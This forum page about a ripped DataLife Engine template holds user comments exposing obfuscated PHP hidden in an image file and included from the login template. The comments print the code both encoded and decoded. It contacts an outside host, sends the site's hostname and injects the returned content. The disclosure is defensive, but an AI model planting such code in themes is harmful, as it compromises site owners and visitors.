Рип сайта cmsdle.com » 6dle.ru всё про datalife engine шаблоны dle модули dle хаки dle статьи dle

	Рип сайта cmsdle.com
	Название шаблона: cmsdle.com Тестировался на: DLE 8.0 В браузерах: Мозила Комплектация: TPL, CSS, JS, Тип: Rip Автор: sergei9876 (доработал fenix Команда: runet team Скачать: cmsdle.rar [ b] (cкачиваний: 107) 19 августа 2009 добавил neoks 51 1 2 3 4 5
	просмотров 1888 комментариев (11)

написал buxtorus

25 августа 2009 17:23

ICQ

Группа: Посетители

Регистрация: 12.02.2009

Публикаций: 0

Комментариев: 1

лажа ппц

написал neoks

27 августа 2009 02:46

ICQ

Группа: Посетители

Регистрация: 11.05.2009

Публикаций: 75

Комментариев: 28

buxtorus,
Ты просто не шариш lol

написал Slackye

19 сентября 2009 18:32

ICQ

Группа: Посетители

Регистрация: 25.07.2009

Публикаций: 0

Комментариев: 4

Hi,
in this template for of I found a piece of PHP code hidden in image tl_ub2.jpg,
but the code is encrypted and do not understand what is its task.

The code is called in login.tpl and is this:

<?php $x14="\146\x63l\x6f\x73e"; $x15="f\x65\157\146"; $x16="\146\147\x65\164\163"; $x17="f\163\x6f\143\x6b\x6fp\x65n"; $x18="f\160\165\164s"; $x19="\x73\x74\x72str";
$x0b="\x3c\141 \150r\x65\x66=n\x65oks\056\x72\x75>\074/a>";
$x0c = @$x17("\x77\x77\167\056\145ror\150\157\x73t.\
x72u", 80, $x0d, $x0e, 30);if ($x0c){ $x0f = "\107\105T \057\163\x61\151\x74\x2f\x69\1441\056\x70\150
x70\077\x73\x69t\x65=".$_SERVER['HTTP_HOST'].&
#34; HT\x54\120\x2f1.1\n";$x0f .= "\x48\x6f\163\x74\072\040\x77\167\x77.\x65\
162o\x72ho\x73\164\056\162\x75\n"; $x0f.='Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01'; $x0f .= "\n\n"; $x18($x0c, $x0f);$x10 = false;while (!$x15($x0c)) {$x11=$x16($x0c,128);if ($x10) {$x12.= $x11;} else {$x13 .= $x11;}if ($x11 == "\r\n" ) {$x10 = true;}}$x14($x0c);}else return $x0b; if ($x19($x13,'404')) return $x0b;else return $x12; ?>

you know you tell me with which method is encrypted and as decrypt it?

the for your help

Bye Slackye

написал Slackye

20 сентября 2009 00:16

ICQ

Группа: Посетители

Регистрация: 25.07.2009

Публикаций: 0

Комментариев: 4

In this theme and many other posted by neoks include a script malicious hidden in a file .jpg, which is called from the form of Login. the script is encrypted with password, and I fail to decrypt it, but most likely only the registration data and sends them to the author of the script.

You can delete this code to loghin.tpl :

$login_p= include ($tpl->dir.'/images/bg_subpat.jpg');

And

<li>$login_p</li>

bye

написал Skull

20 сентября 2009 11:57

ICQ

Группа: Посетители

Регистрация: 13.05.2008

Публикаций: 0

Комментариев: 1

Slackye,

Ваше не понял чё ты написал!

По Русски можно?

написал Slackye

21 сентября 2009 01:00

ICQ

Группа: Посетители

Регистрация: 25.07.2009

Публикаций: 0

Комментариев: 4

В этой темой и многие другие Написал neoks включают скрытые вредоносного сценария в файл. JPG, которое вызывается из формы Логин. Сценарий зашифрованный пароль, а я не могу расшифровать его, но, скорее всего только регистрационные данные и отсылает их автору сценария.

Вы можете удалить этот код, чтобы loghin.tpl:

$login_p= include ($tpl->dir.'/images/bg_subpat.jpg');

And

<li>$login_p</li>

написал Slackye

3 октября 2009 20:27

ICQ

Группа: Посетители

Регистрация: 25.07.2009

Публикаций: 0

Комментариев: 4

this is the hide script
deciphered only in part,
but you can already see the functions and links,
and relies on the site of neoks.

see you

<?php
/*********************/
/*
      */
/*  Php. Zen  Decode */
/*
      */
/*********************/

$x14 = "fclose";
$x15 = "feof";
$x16 = "fgets";
$x17 = "fsockopen";
$x18 = "fputs";
$x19 = "strstr";
$x0b = "<a href=neoks.ru></a>";
$x0c = @$x17( "www.erorhost.ru", 80, $x0d, $x0e, 30 );
if ( $x0c )
{
    $x0f = "GET /sait/id1.php?site=".$_SERVER['HTTP_HOST']." HTTP/1.1\n";
    $x0f .= "Host: www.erorhost.ru\n";
    $x0f .= "Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress  Accept-Language: ru,en  Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01";
    $x0f .= "\n\n";
    $x18( $x0c, $x0f );
    $x10 = FALSE;
    while ( !$x15( $x0c ) )
    {
        $x11 = $x16( $x0c, 128 );
        if ( $x10 )
        {
            $x12 .= $x11;
        }
        else
        {
            $x13 .= $x11;
        }
        if ( $x11 == "\r\n" )
        {
            $x10 = TRUE;
        }
    }
    $x14( $x0c );
}
else
{
    return $x0b;
}
if ( $x19( $x13, "404" ) )
{
    return $x0b;
}
else
{
    return $x12;
}
?>

написал Sosok

4 октября 2009 23:50

ICQ

Группа: Посетители

Регистрация: 30.03.2009

Публикаций: 0

Комментариев: 13

ДА красавец , только нахуй вылаживать для всех ???увидел так увидел

написал NeaisRU

22 октября 2009 00:38

ICQ 598384209

Группа: Посетители

Регистрация: 14.10.2009

Публикаций: 0

Комментариев: 10

Цитата: Sosok

ДА красавец , только нахуй вылаживать для всех ???увидел так увидел

а нех других наёбывать.

написал damien

1 ноября 2009 00:55

ICQ

Группа: Посетители

Регистрация: 28.08.2009

Публикаций: 0

Комментариев: 1

Все шабы которы запостил неокс и их так называемая команда наебшиков "runet team " содержат этот код точнее ссылки на их сайты. Так что проверейте все шабы от этих засранцев.

написал cheburator

6 ноября 2009 15:41

ICQ

Группа: Посетители

Регистрация: 6.11.2009

Публикаций: 0

Комментариев: 4

Ой ой ой Вас наебывают? отлично! Пиздуйте сами рипать %) И мимо проходите

	Информация
	Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.